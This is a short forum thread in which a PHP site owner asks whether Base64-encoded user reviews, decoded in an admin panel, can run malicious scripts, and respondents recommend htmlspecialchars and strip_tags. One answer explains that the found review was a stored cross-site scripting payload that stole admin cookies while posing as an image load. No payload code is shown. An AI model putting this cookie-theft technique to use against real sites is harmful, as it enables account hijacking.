Is it possible to execute a malicious script?

A

Anton2016-07-12 17:53:02

PHP

Anton, 2016-07-12 17:53:02

I have a question, for example, if a user sends a review on my site, it is registered in Base64 in the database, it is decoded in the admin panel for viewing and approval / disapproval, tell me, is it possible to execute malicious code or a shell under the guise of a review in this way? I found signs of hacking, tried to send a simple alert on my own, and so the window fell, it turns out that scripts can be executed. Help how to protect yourself from this? By the way, here's what I found after decoding one of the reviews:

Reply

Answer the question

In order to leave comments, you need to log in

2 answer(s)

E

entermix, 2016-07-12
@boypush

Filter the text before sending it to the database/output at
php.net/manual/ru/function.htmlspecialchars.php
UPD:

htmlspecialchars(strip_tags(base64_decode($otz["text"])));

D

Denis Goncharenko, 2016-07-12
@denis79513

This is a virus, your cookies were stolen, you probably stored your login and password there)))))
Use strip_tags, htmlspecialchars and the like.
Do not store any important information in cookies, maximum information about the browser and other things that do not pose a potential threat. Cookies are the most insecure place. And in this script, the picture is supposedly loaded using js, but your cookies (that is, admin cookies) are actually transferred.